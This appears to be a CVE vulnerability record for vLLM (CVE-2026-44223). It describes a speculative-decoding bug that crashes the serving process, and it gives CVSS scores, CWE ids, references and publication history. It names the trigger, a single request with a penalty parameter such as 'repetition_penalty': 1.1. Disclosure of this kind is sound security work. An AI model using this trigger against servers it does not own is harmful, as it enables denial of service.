CVE-2026-44223 - Vulnerability Details

CVE-2026-44223 - vLLM: extract_hidden_states speculative decoding crashes server on any request with penalty parameters

vLLM is an inference and serving engine for large language models (LLMs). From to before 0.20.0, the extract_hidden_states speculative decoding proposer in vLLM returns a tensor with an incorrect shape after the first decode step, causing a RuntimeError that crashes the EngineCore process. The crash is triggered when any request in the batch uses sampling penalty parameters (repetition_penalty, frequency_penalty, or presence_penalty). A single request with a penalty parameter (e.g., "repetition_penalty": 1.1) is sufficient to crash the server. This vulnerability is fixed in 0.20.0.

No CVSS v4.0

Attack Vector Network

Attack Complexity Low

Privileges Required Low

Scope Unchanged

Confidentiality Impact None

Integrity Impact None

Availability Impact High

User Interaction None

No CVSS v3.0

No CVSS v2

This CVE is not in the KEV list.

Key SSVC decision points have not yet been added.

Vendors	Products
Vllm-project	Vllm

No data.

References

Link	Providers
https://github.com/vllm-project/vllm/pull/38610
https://github.com/vllm-project/vllm/security/advisories/GHSA-83vm-p52w-f9pw

History

Tue, 12 May 2026 23:30:00 +0000

Type	Values Removed	Values Added
First Time appeared		Vllm-project Vllm-project vllm
Vendors & Products		Vllm-project Vllm-project vllm

Tue, 12 May 2026 20:15:00 +0000

Type	Values Removed	Values Added
Description		vLLM is an inference and serving engine for large language models (LLMs). From to before 0.20.0, the extract_hidden_states speculative decoding proposer in vLLM returns a tensor with an incorrect shape after the first decode step, causing a RuntimeError that crashes the EngineCore process. The crash is triggered when any request in the batch uses sampling penalty parameters (repetition_penalty, frequency_penalty, or presence_penalty). A single request with a penalty parameter (e.g., "repetition_penalty": 1.1) is sufficient to crash the server. This vulnerability is fixed in 0.20.0.
Title		vLLM: extract_hidden_states speculative decoding crashes server on any request with penalty parameters
Weaknesses		CWE-131 CWE-704
References		https://github.com/vllm-project/vllm/pull/38610 https://github.com/vllm-project/vllm/security/advisories/GHSA-83vm-p52w-f9pw
Metrics		cvssV3_1 `{'score': 6.5, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}`

MITRE

Status: PUBLISHED

Assigner: GitHub_M

Published: 2026-05-12T19:58:40.862Z

Updated: 2026-05-12T19:58:40.862Z

Reserved: 2026-05-05T15:42:40.518Z

Link: CVE-2026-44223

Vulnrichment

No data.

NVD

Status : Received

Published: 2026-05-12T20:16:43.293

Modified: 2026-05-12T20:16:43.293

Link: CVE-2026-44223

Redhat

No data.

Metrics

Attack Vector Network

Attack Complexity Low

Privileges Required Low

Scope Unchanged

Confidentiality Impact None

Integrity Impact None

Availability Impact High

User Interaction None

Affected Vendors & Products

JSON object

JSON object

JSON object

JSON object